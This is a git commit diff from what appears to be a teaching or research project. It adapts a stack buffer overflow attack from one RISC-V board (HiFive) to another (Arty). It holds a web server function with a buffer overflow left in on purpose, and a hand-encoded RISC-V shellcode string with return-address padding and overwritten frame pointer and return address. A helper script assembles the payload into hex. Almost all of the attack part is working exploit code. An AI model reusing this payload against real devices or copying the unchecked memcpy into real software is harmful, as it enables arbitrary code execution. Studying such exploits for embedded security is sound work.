working impl for same attack as hifive

df6ce1f6 · fptk · 10b2aaee · df6ce1f6 · df6ce1f6 · df6ce1f6
Commit df6ce1f6 authored 4 years ago by fptk
--- a/ArtyImplementation/payload_arty.as
+++ b/ArtyImplementation/payload_arty.as
 .text
-    li a0, 0x2044b37c
+    li a0, 0x2044b330
-    li t3, 0x204408f8
+    li t3, 0x204408aa
    jalr t4, t3
--- a/ArtyImplementation/zone1/server_utility.h
+++ b/ArtyImplementation/zone1/server_utility.h
@@ -29,33 +29,27 @@
 	"</html>"
-char *target = "secret";
+char *admin_name = "my_secret_admin_name";
-char * get_target() {
-	return target;
-}
-int is_target(char *test) {
+int is_admin(char *name, uint32_t name_len) {
-	return strncmp(test, target, strlen(target)) == 0;
+	return strlen(admin_name) == name_len && strncmp(name, admin_name, name_len) == 0;
 }
+char *generate_page(char *name, uint32_t name_len) {
-char *attack_me(char *data, uint32_t data_len) {
+	// nobody could possibly enter a name longer than 120 characters, so this buffer
-	// nobody could possibly enter a name longer than 20 characters, so this buffer
 	// is definitely large enough
 	char message[128];
 	printf2("CD: 0x%08x ", ((uint32_t*)(&message[8])));
-	printf2("F-: 0x%08x ", *((uint32_t*)(&message[136])));
+	printf2("FP: 0x%08x ", *((uint32_t*)(&message[136])));
 	printf2("RA: 0x%08x ", *((uint32_t*)(&message[140])));
-	printf2("FP: 0x%08x ", *((uint32_t*)(&message[156])));
-	memset(message, 'B', sizeof(message));
-	memcpy(message, "Hallo, ", 7);
-	if(strncmp(data, get_target(), strlen(get_target())) == 0) {
+	if(is_admin(name, name_len)) {
-		snprintf(message + 7, strlen(target) + 1, target);
+		memcpy(message, "Willkommen im Admin-Bereich.", 29);
-		snprintf(message + 13, 14 , " ist korrekt!");
 	}
 	else {
-		memcpy(message + 7, data, data_len);
+		memcpy(message, "Hallo, ", 7);
+		memcpy(message + 7, name, name_len);
+		message[7 + name_len] = '\0';
 	}
 	char *result = malloc(strlen(message) + 1);
@@ -74,48 +68,49 @@ char *server_request_handler(char *location, enum request_type type, char *data,
 			data =    "X" // padding to align the instructions
 			          "\x37\xb5\x44\x20" // 0: lui a0,0x2044b
-			          "\x13\x05\xc5\x37" // 4: addi a0,a0,892 # 0x2044b37c
+			          "\x13\x05\x05\x33" // 4: addi a0,a0,816 # 0x2044b330
 			          "\x37\x1e\x44\x20" // 8: lui t3,0x20441
-			          "\x13\x0e\x8e\x8f" // c: addi t3,t3,-1800 # 0x204408f8
+			          "\x13\x0e\xae\x8a" // c: addi t3,t3,-1878 # 0x204408aa
 			          "\xe7\x0e\x0e\x00" // 10: jalr t4,t3
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+			          "XXXX" // padding to overwrite the return address
+					  "XXXX" // padding to overwrite the return address
+			          "\x2C\x69\x00\x80" // the new frame pointer: 0x8000692C
+			          "\x78\x68\x00\x80"; // the new return address: 0x80006878
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-					          "XXXX" // padding to overwrite the return address
-			          "XXXX" // padding to overwrite the return address
-			          "\x2c\x69\x00\x80" // the new frame pointer: 0x80004ba2
-			          "\x78\x68\x00\x80"; // the new return address: 0x80006870
 			// nobody could possibly enter a name longer than 20 characters, so this buffer
 			// is definitely large enough
 			char *return_string;
 			//return_string = attack_me(&data[5], name_len);
-			return_string = attack_me(data, 137);
+			return_string = generate_page(data, 137);
 			char* response = http_prepare_response(return_string, strlen(return_string), 200, out_len);
 			//free(return_string);

--- a/assembler.py
+++ b/assembler.py
@@ -9,7 +9,7 @@ march = "rv32i"
 reverse_bytes = True
 # "%", for percent encoding
 # "\\x", if no percent decoding occurs
-encode_char = "%"
+encode_char = "\\x"
 def split_hex_str(hex_str):
    return [hex_str[0:2], hex_str[2:4], hex_str[4:6], hex_str[6:8]]
@@ -102,4 +102,5 @@ with subprocess.Popen([objdump, "-D", "a.out"], stdout=subprocess.PIPE) as objdu
 print("running xclip for hex to clipboard")
 subprocess.run(["xclip", "-selection", "clipboard", "-noutf8", "-in", "i_am_bin_dump"])
+#if needed when xclip does not work, do not delete i_am_bin_dump here and cat & copy it
 subprocess.run(["rm", "a.out", "i_am_bin_dump"])